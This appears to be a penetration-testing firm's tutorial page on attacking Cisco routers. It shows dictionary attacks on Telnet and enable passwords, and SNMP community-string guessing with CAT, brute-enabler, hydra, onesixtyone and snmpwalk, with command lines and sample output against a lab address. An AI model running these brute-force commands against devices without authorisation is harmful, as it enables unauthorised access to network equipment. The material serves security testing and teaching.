1. External Penetration Testing
- Penetration Testing of Windows
- Self-testing Security
- Laptop Hacking
2. Enterprise Penetration Testing
- Penetration Testing of your VPN
- Domain Controller Penetration Testing
- Tools; Metasploit
- Choosing a penetration Testing Supplier
3. CISCO Penetration Testing
- CISCO Penetration Testing
- Scan & Fingerprint
- Credentials Guessing
- Connect
- Vulnerability Assessment
- Further your attack
- CISCO Command Refference
|
|
CISCO Penetration Testing - Password Guessing/SNMP Attacks
- CAT (Cisco Auditing Tool)
This tool extends beyond
simple discovery and can perform dictionary based attacks against the Telnet
server and SNMP agents.
./CAT -h <IP> -a
password.wordlist
BT cisco-auditing-tool-v.1.0 # CAT -h 10.1.1.175 -a
/tmp/dict.txt Cisco Auditing Tool - g0ne [null0] Checking Host:
10.1.1.175
Guessing passwords: Invalid Password: 1234 Invalid
Password: 2read Invalid Password: 4changes Password Found:
telnet Invalid Password: CISCO Invalid Password: IBM
- Brute-enabler
Brute-enabler is an internal enable password guesser. You
require valid non-privilege mode credentials to use this tool, they can be
either SSH or Telnet.
./enabler <IP> [-u username] -p password
/password.wordlist [port]
BT brute-enable-v.1.0.2 # ./enabler 10.1.1.175
telnet /tmp/dict.txt
[`] enabler. [`] cisco internal bruteforcer.
concept by anyone [`] coded by norby [`] [`] only password needed.
sending [telnet] [`] seems we are logged in :) [`] telnet... wrong
password [`] CISCO... wrong password [`] IBM... wrong password [`]
OrigEquipMfr... wrong password [`] Cisco... wrong password [`] agent...
wrong password [`] all... wrong password [`] possible password found:
cisco
- hydra
Hydra is a multi-functional password guessing
tool. It can connect and pass guessed credentials for many protocols and
services, including Cisco Telnet which may only require a password.
Make
sure that you limit the threads to 4 (-t 4) as it will just overload the Telnet
server!
BT tmp # hydra -l "" -P password.wordlist -t 4 <IP>
cisco Hydra v5.3 (c) 2006 by van Hauser / THC - use allowed only for legal
purposes. Hydra (http://www.thc.org) starting at 2007-02-26
10:54:10 [DATA] 4 tasks, 1 servers, 59 login tries (l:1/p:59), ~14 tries per
task [DATA] attacking service cisco on port 23 Error: Child with pid 21671
was disconnected - retrying (1 of 1 retries) Error: Child with pid 21673 was
disconnected - retrying (1 of 1 retries) Error: Child with pid 21670 was
disconnected - retrying (1 of 1 retries) Error: Child with pid 21673 was
disconnected - exiting Error: Child with pid 21671 was disconnected -
retrying (1 of 1 retries) Error: Child with pid 21672 terminating, can not
connect Error: Child with pid 21671 was disconnected - retrying (1 of 1
retries) Error: Child with pid 21707 was disconnected - retrying (1 of 1
retries) Error: Child with pid 21671 was disconnected - retrying (1 of 1
retries) [STATUS] attack finished for 10.1.1.175 (waiting for childs to
finish) [23][cisco] host: 10.1.1.175 login: password: telnet Hydra
(http://www.thc.org) finished at 2007-02-26 10:54:23
SNMP Attacks
- CAT (Cisco Auditing Tool)
This tool extends beyond simple discovery and can perform dictionary based attacks against the Telnet server and SNMP agents.
./CAT -h <IP> -w SNMP.wordlist
BT
cisco-auditing-tool-v.1.0 # CAT -h 10.1.1.175 -w /tmp/snmp.txt Cisco Auditing
Tool - g0ne [null0]
Checking Host: 10.1.1.175 Guessing
passwords: Invalid Password: cisco Invalid Password: ciscos Invalid
Password: cisco1
Guessing Community Names: Invalid Community Name:
CISCO Invalid Community Name: IBM Invalid Community Name:
OrigEquipMfr Community Name Found: Cisco Invalid Community Name:
SNMP
- Onesixtyone
onesixtyone is a reliable SNMP community string guesser.
Once it identifies the correct community string, it will display accurate
fingerprinting information.
onesixytone -c SNMP.wordlist
<IP>
BT onesixtyone-0.3.2 # onesixtyone -c dict.txt
10.1.1.175 Scanning 1 hosts, 64 communities 10.1.1.175 [enable] Cisco
Internetwork Operating System Software IOS (tm) C2600 Software
(C2600-IK9O3S3-M), Version 12.2(15)T17, RELEASE SOFTWARE (fc1) Technical
Support: http://www.cisco.com/techsupport Copyright (c) 1986-2005 by cisco
Systems, Inc. Compiled Fri 12-Aug 10.1.1.175 [Cisco] Cisco Internetwork
Operating System Software IOS (tm) C2600 Software (C2600-IK9O3S3-M), Version
12.2(15)T17, RELEASE SOFTWARE (fc1) Technical Support:
http://www.cisco.com/techsupport Copyright (c) 1986-2005 by cisco Systems, Inc.
Compiled Fri 12-Aug
- snmpwalk
snmpwalk is part of the SNMP toolkit. After a
valid community string is identified, you should use snmpwalk to 'walk' the SNMP
Management Information Base (MIB) for further information. Ensure that you get
the correct version of SNMP protocol in use or it will not work correctly. It
may be a good idea to redirect the output to a text file for easier viewing as
the tool outputs a large amount of text.
snmapwalk -v <Version> -c
<Community string> <IP>
BT# snmpwalk -v 1 -c enable
10.1.1.1 SNMPv2-MIB::sysDescr.0 = STRING: Cisco Internetwork Operating System
Software IOS (tm) C2600 Software (C2600-IK9O3S3-M), Version 12.2(15)T17,
RELEASE SOFTWARE (fc1) Technical Support:
http://www.cisco.com/techsupport Copyright (c) 1986-2005 by cisco Systems,
Inc. Compiled Fri 12-Aug SNMPv2-MIB::sysObjectID.0 = OID:
SNMPv2-SMI::enterprises.9.1.185 DISMAN-EVENT-MIB::sysUpTimeInstance =
Timeticks: (363099) 1:00:30.99 SNMPv2-MIB::sysContact.0 =
STRING: SNMPv2-MIB::sysName.0 = STRING: router SNMPv2-MIB::sysLocation.0 =
STRING: SNMPv2-MIB::sysServices.0 = INTEGER:
78 SNMPv2-MIB::sysORLastChange.0 = Timeticks: (0)
0:00:00.00 IF-MIB::ifNumber.0 = INTEGER: 4
To receive your CISCO Password Recovery Service , please submit your payment of $1999.00 If more than 100 miles of travel will be required, the additional cost will be billed separatelly.
|